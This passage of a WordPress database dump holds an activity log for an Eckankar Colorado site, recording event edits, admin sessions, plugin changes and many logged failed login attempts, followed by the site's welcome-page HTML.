Spirit. This workshop focuses on the inner work you can do to make your dream a reality. We will use simple spiritual techniques and exercises to help you come into alignment with your dream and create a roadmap to a happier more successful you.</span></p>\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/spiritual-experiences-group-of-longmont/events/296301686/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>COVID-19 Safety Measures<br>\n**</strong> <em>Since contracting COVID-19 may still be possible, please take the health steps you consider best. It is appreciated that by attending you are taking responsibility for your own health.</em></span></p>\n</div>\n</div>\n</div>\n</div>'),(214008,35218,'post_type','mec-events'),(214007,35218,'post_id','269118'),(214006,35217,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269118&action=edit'),(214003,35217,'_user_login','john-admin-96'),(214004,35217,'_user_email','nadazipought@zilch.org'),(214005,35217,'_server_remote_addr','174.16.128.x'),(214002,35217,'_user_id','15'),(214001,35217,'_message_key','post_updated'),(214000,35217,'post_meta_added','78'),(213999,35217,'post_title','Manifest Your Heart’s Desire'),(213997,35217,'post_id','269118'),(213998,35217,'post_type','mec-events'),(213995,35216,'_server_remote_addr','174.16.128.x'),(213996,35216,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269118&action=edit'),(213994,35216,'_user_email','nadazipought@zilch.org'),(213991,35216,'_message_key','post_updated'),(213992,35216,'_user_id','15'),(213993,35216,'_user_login','john-admin-96'),(213990,35216,'post_meta_added','78'),(213989,35216,'post_title','Manifest Your Heart’s Desire'),(213987,35216,'post_id','269118'),(213988,35216,'post_type','mec-events'),(213985,35215,'_server_remote_addr','174.16.128.x'),(213986,35215,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269118&action=edit'),(213984,35215,'_user_email','nadazipought@zilch.org'),(213983,35215,'_user_login','john-admin-96'),(213981,35215,'_message_key','post_updated'),(213982,35215,'_user_id','15'),(213980,35215,'post_meta_added','78'),(213977,35215,'post_id','269118'),(213978,35215,'post_type','mec-events'),(213979,35215,'post_title','Manifest Your Heart’s Desire'),(213975,35214,'_server_remote_addr','174.16.128.x'),(213976,35214,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269118&action=edit'),(213974,35214,'_user_email','nadazipought@zilch.org'),(213971,35214,'_message_key','post_updated'),(213972,35214,'_user_id','15'),(213973,35214,'_user_login','john-admin-96'),(213970,35214,'post_meta_added','78'),(213968,35214,'post_type','mec-events'),(213969,35214,'post_title','Manifest Your Heart’s Desire'),(213944,35211,'user_id','15'),(213945,35211,'user_email','nadazipought@zilch.org'),(213946,35211,'user_login','john-admin-96'),(213947,35211,'_user_id','15'),(213948,35211,'_user_login','john-admin-96'),(213949,35211,'_user_email','nadazipought@zilch.org'),(213950,35211,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36'),(213951,35211,'_message_key','user_logged_in'),(213952,35211,'_server_remote_addr','174.16.128.x'),(213953,35211,'_server_http_referer','https://eckankar-colorado.org/wp-login.php'),(213954,35212,'failed_username','admin'),(213955,35212,'server_http_user_agent','Mozilla/5.0'),(213956,35212,'_message_key','user_unknown_login_failed'),(213957,35212,'_server_remote_addr','20.205.9.x'),(213958,35213,'post_id','269118'),(213959,35213,'post_type','mec-events'),(213960,35213,'post_title','Copy of MEETUP TEMPLATE-In Person or Online-Now Called a Spiritual Discussion | Title Goes Here'),(213961,35213,'_message_key','post_updated'),(213962,35213,'_user_id','15'),(213963,35213,'_user_login','john-admin-96'),(213964,35213,'_user_email','nadazipought@zilch.org'),(213965,35213,'_server_remote_addr','174.16.128.x'),(213966,35213,'_server_http_referer','https://eckankar-colorado.org/wp-admin/edit.php?s=template&post_status=all&post_type=mec-events&action=-1&m=0&mec_start_date&mec_label=0&mec_location=0&mec_category=0&_mecnonce=765a39ab5f&mec%5Btitle%5D&mec%5Bcolor%5D=%23&mec%5Bdate%5D%5Bstart%5D%5Bdate%5D=09%2F27%2F2023&mec%5Bdate%5D%5Bstart%5D%5Bhour%5D=8&mec%5Bdate%5D%5Bstart%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bstart%5D%5Bampm%5D=AM&mec%5Bdate%5D%5Bend%5D%5Bdate%5D=09%2F27%2F2023&mec%5Bdate%5D%5Bend%5D%5Bhour%5D=6&mec%5Bdate%5D%5Bend%5D%5Bminutes%5D=0&mec%5Bdate%5D%5Bend%5D%5Bampm%5D=PM&mec%5Blocation_id%5D=1&mec%5Bdont_show_map%5D=1&mec%5Blocation%5D%5Bname%5D&mec%5Blocation%5D%5Baddress%5D&mec%5Blocation%5D%5Blatitude%5D&mec%5Blocation%5D%5Blongitude%5D&mec%5Borganizer_id%5D=1&mec%5Borganizer%5D%5Bname%5D&mec%5Borganizer%5D%5Btel%5D&mec%5Borganizer%5D%5Bemail%5D&mec%5Borganizer%5D%5Burl%5D&mec%5Borganizer%5D%5Bpage_label%5D&mec%5Borganizer%5D%5Bthumbnail%5D&mec%5Bcontent%5D&mec%5Bfeatured_image%5D&paged=1&action2=-1'),(213943,35210,'_server_remote_addr','150.109.148.x'),(213942,35210,'_message_key','user_unknown_login_failed'),(213940,35210,'failed_username','wwwadmin'),(213941,35210,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(213886,35196,'_message_key','user_unknown_login_failed'),(213887,35196,'_server_remote_addr','20.205.9.x'),(213888,35197,'failed_username','admin'),(213889,35197,'server_http_user_agent','Mozilla/5.0'),(213890,35197,'_message_key','user_unknown_login_failed'),(213891,35197,'_server_remote_addr','20.205.9.x'),(213892,35198,'failed_username','admin'),(213893,35198,'server_http_user_agent','Mozilla/5.0'),(213894,35198,'_message_key','user_unknown_login_failed'),(213895,35198,'_server_remote_addr','20.205.9.x'),(213896,35199,'failed_username','admin'),(213897,35199,'server_http_user_agent','Mozilla/5.0'),(213898,35199,'_message_key','user_unknown_login_failed'),(213899,35199,'_server_remote_addr','20.205.9.x'),(213900,35200,'failed_username','admin'),(213901,35200,'server_http_user_agent','Mozilla/5.0'),(213902,35200,'_message_key','user_unknown_login_failed'),(213903,35200,'_server_remote_addr','20.205.9.x'),(213904,35201,'failed_username','admin'),(213905,35201,'server_http_user_agent','Mozilla/5.0'),(213906,35201,'_message_key','user_unknown_login_failed'),(213907,35201,'_server_remote_addr','20.205.9.x'),(213908,35202,'failed_username','wadminw'),(213909,35202,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(213910,35202,'_message_key','user_unknown_login_failed'),(213911,35202,'_server_remote_addr','52.140.17.x'),(213912,35203,'failed_username','admin'),(213913,35203,'server_http_user_agent','Mozilla/5.0'),(213914,35203,'_message_key','user_unknown_login_failed'),(213915,35203,'_server_remote_addr','20.205.9.x'),(213916,35204,'failed_username','admin'),(213917,35204,'server_http_user_agent','Mozilla/5.0'),(213918,35204,'_message_key','user_unknown_login_failed'),(213919,35204,'_server_remote_addr','20.205.9.x'),(213920,35205,'failed_username','admin'),(213921,35205,'server_http_user_agent','Mozilla/5.0'),(213922,35205,'_message_key','user_unknown_login_failed'),(213923,35205,'_server_remote_addr','20.205.9.x'),(213924,35206,'failed_username','admin'),(213925,35206,'server_http_user_agent','Mozilla/5.0'),(213926,35206,'_message_key','user_unknown_login_failed'),(213927,35206,'_server_remote_addr','20.205.9.x'),(213928,35207,'failed_username','admin'),(213929,35207,'server_http_user_agent','Mozilla/5.0'),(213930,35207,'_message_key','user_unknown_login_failed'),(213931,35207,'_server_remote_addr','20.205.9.x'),(213932,35208,'failed_username','admin'),(213933,35208,'server_http_user_agent','Mozilla/5.0'),(213934,35208,'_message_key','user_unknown_login_failed'),(213935,35208,'_server_remote_addr','20.205.9.x'),(213936,35209,'failed_username','admin'),(213937,35209,'server_http_user_agent','Mozilla/5.0'),(213938,35209,'_message_key','user_unknown_login_failed'),(213939,35209,'_server_remote_addr','20.205.9.x'),(213881,35195,'server_http_user_agent','Mozilla/5.0'),(213882,35195,'_message_key','user_unknown_login_failed'),(213883,35195,'_server_remote_addr','20.205.9.x'),(213884,35196,'failed_username','admin'),(213885,35196,'server_http_user_agent','Mozilla/5.0'),(213862,35190,'_message_key','user_unknown_login_failed'),(213863,35190,'_server_remote_addr','20.205.9.x'),(213864,35191,'failed_username','admin'),(213865,35191,'server_http_user_agent','Mozilla/5.0'),(213866,35191,'_message_key','user_unknown_login_failed'),(213867,35191,'_server_remote_addr','20.205.9.x'),(213868,35192,'failed_username','admin'),(213869,35192,'server_http_user_agent','Mozilla/5.0'),(213870,35192,'_message_key','user_unknown_login_failed'),(213871,35192,'_server_remote_addr','20.205.9.x'),(213872,35193,'failed_username','admin'),(213873,35193,'server_http_user_agent','Mozilla/5.0'),(213874,35193,'_message_key','user_unknown_login_failed'),(213875,35193,'_server_remote_addr','20.205.9.x'),(213876,35194,'failed_username','admin'),(213877,35194,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(213878,35194,'_message_key','user_unknown_login_failed'),(213879,35194,'_server_remote_addr','103.176.78.x'),(213880,35195,'failed_username','admin'),(213861,35190,'server_http_user_agent','Mozilla/5.0'),(213860,35190,'failed_username','admin'),(213859,35189,'_server_remote_addr','20.205.9.x'),(213858,35189,'_message_key','user_unknown_login_failed'),(213857,35189,'server_http_user_agent','Mozilla/5.0'),(213856,35189,'failed_username','admin'),(213855,35188,'_server_remote_addr','20.205.9.x'),(213854,35188,'_message_key','user_unknown_login_failed'),(213852,35188,'failed_username','admin'),(213853,35188,'server_http_user_agent','Mozilla/5.0'),(213851,35187,'_server_remote_addr','94.23.61.x'),(213850,35187,'_message_key','user_unknown_login_failed'),(213849,35187,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36'),(213848,35187,'failed_username','admin'),(213847,35186,'_server_remote_addr','20.205.9.x'),(213846,35186,'_message_key','user_unknown_login_failed'),(213845,35186,'server_http_user_agent','Mozilla/5.0'),(213844,35186,'failed_username','admin'),(213843,35185,'_server_remote_addr','67.205.58.x'),(213842,35185,'_message_key','user_unknown_login_failed'),(213840,35185,'failed_username','admin'),(213841,35185,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(213839,35184,'_server_remote_addr','171.244.0.x'),(213838,35184,'_message_key','user_unknown_login_failed'),(213837,35184,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36'),(213836,35184,'failed_username','admin'),(213835,35183,'_server_remote_addr','147.135.255.x'),(213834,35183,'_message_key','user_unknown_login_failed'),(213832,35183,'failed_username','admin'),(213833,35183,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(213831,35182,'_server_remote_addr','150.109.148.x'),(213830,35182,'_message_key','user_unknown_login_failed'),(213829,35182,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(213828,35182,'failed_username','admin'),(213827,35181,'_server_http_referer','https://eckankar-colorado.org/wp-admin/admin.php?page=wpstg-welcome'),(213826,35181,'_server_remote_addr','76.130.120.x'),(213825,35181,'_message_key','user_logged_out'),(213824,35181,'_user_email','nada@zipnadanot.org'),(213823,35181,'_user_login','S8zhaBda'),(213822,35181,'_user_id','2'),(213820,35180,'_server_remote_addr','76.130.120.x'),(213821,35180,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php?plugin_status=all&paged=1&s'),(213819,35180,'_user_email','nada@zipnadanot.org'),(213817,35180,'_user_id','2'),(213818,35180,'_user_login','S8zhaBda'),(213816,35180,'_message_key','plugin_activated'),(213815,35180,'plugin_url','https://wordpress.org/plugins/wp-staging'),(213814,35180,'plugin_version','3.0.4'),(213813,35180,'plugin_author','<a href=\"https://wp-staging.com/backup-wordpress\">WP-STAGING, WPStagingBackup</a>'),(213812,35180,'plugin_description','Backup Restore <cite>By <a href=\"https://wp-staging.com/backup-wordpress\">WP-STAGING, WPStagingBackup</a>.</cite>'),(213811,35180,'plugin_title','<a href=\"https://wordpress.org/plugins/wp-staging\">Backup Duplicator &amp; Migration - WP STAGING</a>'),(213810,35180,'plugin_slug','wp-staging'),(213809,35180,'plugin_name','Backup Duplicator &amp; Migration - WP STAGING'),(213808,35179,'_server_http_referer','https://eckankar-colorado.org/wp-admin/plugins.php'),(213807,35179,'_server_remote_addr','76.130.120.x'),(213806,35179,'_user_email','nada@zipnadanot.org'),(213805,35179,'_user_login','S8zhaBda'),(213803,35179,'_message_key','plugin_deactivated'),(213804,35179,'_user_id','2'),(213801,35179,'plugin_version','3.0.4'),(213802,35179,'plugin_url','https://wordpress.org/plugins/wp-staging'),(213800,35179,'plugin_author','<a href=\"https://wp-staging.com/backup-wordpress\">WP-STAGING, WPStagingBackup</a>'),(213799,35179,'plugin_description','Backup Restore <cite>By <a href=\"https://wp-staging.com/backup-wordpress\">WP-STAGING, WPStagingBackup</a>.</cite>'),(213798,35179,'plugin_title','<a href=\"https://wordpress.org/plugins/wp-staging\">Backup Duplicator &amp; Migration - WP STAGING</a>'),(213797,35179,'plugin_slug','wp-staging'),(213796,35179,'plugin_name','Backup Duplicator &amp; Migration - WP STAGING'),(213794,35178,'_server_remote_addr','76.130.120.x'),(213795,35178,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Feckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(213793,35178,'_message_key','user_logged_in'),(213792,35178,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36'),(213788,35178,'user_login','S8zhaBda'),(213789,35178,'_user_id','2'),(213790,35178,'_user_login','S8zhaBda'),(213791,35178,'_user_email','nada@zipnadanot.org'),(213787,35178,'user_email','nada@zipnadanot.org'),(213786,35178,'user_id','2'),(213785,35177,'_server_remote_addr','8.219.51.x'),(213784,35177,'_message_key','user_unknown_login_failed'),(213783,35177,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(213782,35177,'failed_username','admin'),(213781,35176,'_server_http_referer','https://eckankar-colorado.org/wp-admin/profile.php'),(213780,35176,'_server_remote_addr','76.130.120.x'),(213777,35176,'_user_login','S8zhaBda'),(213778,35176,'_user_email','nada@zipnadanot.org'),(213779,35176,'_message_key','user_logged_out'),(213776,35176,'_user_id','2'),(213775,35175,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(213773,35175,'_message_key','user_logged_in'),(213774,35175,'_server_remote_addr','76.130.120.x'),(213772,35175,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0'),(213771,35175,'_user_email','nada@zipnadanot.org'),(213769,35175,'_user_id','2'),(213770,35175,'_user_login','S8zhaBda'),(213768,35175,'user_login','S8zhaBda'),(213765,35174,'_server_remote_addr','13.79.17.x'),(213766,35175,'user_id','2'),(213767,35175,'user_email','nada@zipnadanot.org'),(213764,35174,'_message_key','user_unknown_login_failed'),(213763,35174,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36'),(213762,35174,'failed_username','admin'),(213761,35173,'_server_http_referer','https://eckankar-colorado.org/resa-faq/satsang-class-registrations-2023-2024/'),(213760,35173,'_server_remote_addr','97.117.106.x'),(213758,35173,'post_title',''),(213759,35173,'_message_key','post_updated'),(213755,35172,'_server_remote_addr','106.15.38.x'),(213756,35173,'post_id','269116'),(213757,35173,'post_type','nf_sub'),(213754,35172,'_message_key','user_unknown_login_failed'),(213753,35172,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.89 Safari/537.36'),(213752,35172,'failed_username','admin'),(213750,35171,'_message_key','user_unknown_login_failed'),(213751,35171,'_server_remote_addr','67.205.58.x'),(213748,35171,'failed_username','admin'),(213749,35171,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(213747,35170,'_server_remote_addr','203.112.76.x'),(213746,35170,'_message_key','user_unknown_login_failed'),(213745,35170,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),(213743,35169,'_server_remote_addr','35.187.58.x'),(213744,35170,'failed_username','admin'),(213742,35169,'_message_key','user_unknown_login_failed'),(213741,35169,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(213740,35169,'failed_username','admin'),(213739,35168,'_server_remote_addr','87.98.171.x'),(213738,35168,'_message_key','user_unknown_login_failed'),(213736,35168,'failed_username','admin'),(213737,35168,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),(213735,35167,'_server_remote_addr','43.241.70.x'),(213734,35167,'_message_key','user_unknown_login_failed'),(213732,35167,'failed_username','admin'),(213733,35167,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36'),(213731,35166,'_server_remote_addr','23.97.205.x'),(213730,35166,'_message_key','user_unknown_login_failed'),(213729,35166,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(213728,35166,'failed_username','admin'),(213727,35165,'_server_remote_addr','34.32.212.x'),(213726,35165,'_xmlrpc_request','true'),(213725,35165,'_message_key','user_unknown_login_failed'),(213724,35165,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(213722,35164,'_server_remote_addr','171.244.0.x'),(213723,35165,'failed_username','lina-muriel'),(213721,35164,'_message_key','user_unknown_login_failed'),(213720,35164,'server_http_user_agent','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(213719,35164,'failed_username','admin'),(213718,35163,'_server_remote_addr','173.231.231.x'),(213717,35163,'_message_key','plugin_update_available'),(213716,35163,'plugin_new_version','7.10.4'),(213715,35163,'plugin_current_version','7.10.3'),(213714,35163,'plugin_name','Wordfence Security'),(213712,35162,'_message_key','plugin_update_available'),(213713,35162,'_server_remote_addr','173.231.231.x'),(213711,35162,'plugin_new_version','3.0.5'),(213710,35162,'plugin_current_version','3.0.4'),(213709,35162,'plugin_name','Backup Duplicator &amp; Migration - WP STAGING'),(213708,35161,'_server_remote_addr','172.104.53.x'),(213707,35161,'_xmlrpc_request','true'),(213706,35161,'_message_key','user_unknown_login_failed'),(213705,35161,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(213704,35161,'failed_username','keith-ahrens'),(213703,35160,'_server_http_referer','https://eckankar-colorado.org/wp-admin/'),(213702,35160,'_server_remote_addr','76.130.120.x'),(213700,35160,'_user_email','nada@zipnadanot.org'),(213701,35160,'_message_key','user_logged_out'),(213699,35160,'_user_login','S8zhaBda'),(213698,35160,'_user_id','2'),(213697,35159,'_server_remote_addr','173.231.231.x'),(213695,35159,'_message_key','purged_events'),(213696,35159,'_wp_cron_running','true'),(213694,35159,'num_rows','419'),(213693,35159,'days','60'),(231597,39188,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 